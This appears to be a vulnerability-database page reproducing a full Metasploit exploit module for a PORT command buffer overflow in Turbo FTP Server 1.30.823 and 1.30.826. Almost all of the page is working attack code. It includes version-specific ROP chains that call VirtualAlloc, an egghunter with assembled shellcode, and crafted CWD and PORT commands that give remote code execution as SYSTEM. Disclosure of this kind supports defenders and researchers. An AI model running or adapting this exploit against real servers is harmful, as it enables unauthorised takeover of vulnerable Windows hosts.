Lucene search
K

Turbo FTP Server 1.30.823 PORT Overflow

🗓️ 22 Oct 2012 00:00:00Reported by corelanc0d3rType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 26 Views

Turbo FTP Server 1.30.823 PORT Overflow. Buffer overflow in Turbo FTP Server allows remote code execution as SYSTEM

Code
`##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# web site for more information on licensing and terms of use.  
# http://metasploit.com/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = GreatRanking  
  
include Msf::Exploit::Remote::Ftp  
include Msf::Exploit::Remote::Egghunter  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Turbo FTP Server 1.30.823 PORT Overflow',  
'Description' => %q{  
This module exploits a buffer overflow vulnerability found in the PORT  
command in Turbo FTP Server 1.30.823 & 1.30.826, which results in remote  
code execution under the context of SYSTEM.  
},  
'Author' =>  
[  
'Zhao Liang', #Initial Descovery  
'Lincoln', #Metasploit  
'corelanc0d3r', #Metasploit  
'thelightcosine' #Metasploit  
],  
'License' => MSF_LICENSE,  
'Platform' => [ 'win' ],  
'References' =>  
[  
[ 'OSVDB', '85887' ]  
],  
'Payload' =>  
{  
'BadChars' => "\x00",  
'EncoderType' => Msf::Encoder::Type::AlphanumMixed,  
'EncoderOptions' => { 'BufferRegister' => 'EDI' }  
},  
'Targets' =>  
[  
[ 'Automatic', {} ],  
['Windows Universal TurboFtp 1.30.823',  
{  
'Ret' => 0x00411985, # RETN (ROP NOP) [tbssvc.exe]  
'ver' => 823  
},  
  
],  
[ 'Windows Universal TurboFtp 1.30.826',  
{  
'Ret' => 0x004fb207, # RETN (ROP NOP) [tbssvc.exe]  
'ver' => 826  
},  
],  
],  
  
'DisclosureDate' => 'Oct 03 2012',  
'DefaultTarget' => 0))  
end  
  
def check  
connect  
disconnect  
if (banner =~ /1\.30\.823/)  
return Exploit::CheckCode::Vulnerable  
elsif (banner =~ /1\.30\.826/)  
return Exploit::CheckCode::Vulnerable  
end  
return Exploit::CheckCode::Safe  
end  
  
  
def create_rop_chain(ver)  
# rop chain generated with mona.py - www.corelan.be  
if ver == 823  
rop_gadgets =  
[  
0x004b692a, # POP ECX # RETN [tbssvc.exe]  
0x005f6074, # ptr to &VirtualAlloc() [IAT tbssvc.exe]  
0x0046f82a, # MOV EDX,DWORD PTR DS:[ECX] # SUB EAX,EDX # RETN [tbssvc.exe]  
0x00423b95, # XCHG EDX,EDI # RETN [tbssvc.exe]  
0x00423a27, # XCHG ESI,EDI # RETN [tbssvc.exe]  
0x005d1c99, # POP EBP # RETN [tbssvc.exe]  
0x004cad5d, # & jmp esp [tbssvc.exe]  
0x004ab16b, # POP EBX # RETN [tbssvc.exe]  
0x00000001, # 0x00000001-> ebx  
0x005ef7f6, # POP EDX # RETN [tbssvc.exe]  
0x00001000, # 0x00001000-> edx  
0x005d7139, # POP ECX # RETN [tbssvc.exe]  
0x00000040, # 0x00000040-> ecx  
0x004df1e0, # POP EDI # RETN [tbssvc.exe]  
0x00411985, # RETN (ROP NOP) [tbssvc.exe]  
0x00502639, # POP EAX # RETN [tbssvc.exe]  
0x90909090, # nop  
0x00468198, # PUSHAD # RETN [tbssvc.exe]  
].flatten.pack("V*")  
  
elsif ver == 826  
rop_gadgets =  
[  
0x0050eae4, # POP ECX # RETN [tbssvc.exe]  
0x005f7074, # ptr to &VirtualAlloc() [IAT tbssvc.exe]  
0x004aa7aa, # MOV EDX,DWORD PTR DS:[ECX] # SUB EAX,EDX # RETN [tbssvc.exe]  
0x00496A65, # XOR EAX,EAX [tbssvc.exe]  
0x004badda, # ADD EAX,EDX # RETN [tbssvc.exe]  
0x00411867, # XCHG EAX,ESI # XOR EAX,EAX # POP EBX # RETN [tbssvc.exe]  
0x00000001, # 0x00000001-> ebx  
0x0058a27a, # POP EBP # RETN [tbssvc.exe]  
0x004df7dd, # & call esp [tbssvc.exe]  
0x005f07f6, # POP EDX # RETN [tbssvc.exe]  
0x00001000, # 0x00001000-> edx  
0x004adc08, # POP ECX # RETN [tbssvc.exe]  
0x00000040, # 0x00000040-> ecx  
0x00465fbe, # POP EDI # RETN [tbssvc.exe]  
0x004fb207, # RETN (ROP NOP) [tbssvc.exe]  
0x00465f36, # POP EAX # RETN [tbssvc.exe]  
0x90909090, # nop  
0x004687ff, # PUSHAD # RETN [tbssvc.exe]  
].flatten.pack("V*")  
end  
return rop_gadgets  
  
end  
  
def exploit  
my_target = target  
if my_target.name == 'Automatic'  
print_status("Automatically detecting the target")  
connect  
disconnect  
  
if (banner =~ /1\.30\.823/)  
my_target = targets[1]  
elsif (banner =~ /1\.30\.826/)  
my_target = targets[2]  
end  
if (not my_target)  
print_status("No matching target...quiting")  
return  
end  
target = my_target  
end  
  
print_status("Selected Target: #{my_target.name}")  
connect_login  
  
rop_chain = create_rop_chain(target['ver'])  
rop = rop_chain.unpack('C*').join(',')  
  
eggoptions =  
{  
:checksum => true,  
:eggtag => 'w00t',  
:depmethod => 'virtualalloc',  
:depreg => 'esi'  
}  
  
badchars = "\x00"  
hunter,egg = generate_egghunter(payload.encoded, badchars, eggoptions)  
  
speedupasm = "mov edx,eax\n"  
speedupasm << "sub edx,0x1000\n"  
speedupasm << "sub esp,0x1000"  
speedup = Metasm::Shellcode.assemble(Metasm::Ia32.new, speedupasm).encode_string  
  
fasterhunter = speedup  
fasterhunter << hunter  
  
print_status("Connecting to target #{target.name} server")  
  
buf1 = rand_text_alpha(2012)  
buf1 << egg  
buf1 << rand_text_alpha(100)  
  
buf2 = rand_text_alpha(4).unpack('C*').join(',')  
buf2 << ","  
buf2 << [target['Ret']].pack("V").unpack('C*').join(',') #eip  
buf2 << ","  
buf2 << rop  
buf2 << ","  
buf2 << fasterhunter.unpack('C*').join(',')  
buf2 << ","  
buf2 << rand_text_alpha(90).unpack('C*').join(',')  
  
send_cmd( ['CWD', buf1], true );  
send_cmd( ['PORT', buf2], true );  
  
print_status("Egghunter deployed, locating shellcode")  
  
handler  
disconnect  
end  
  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation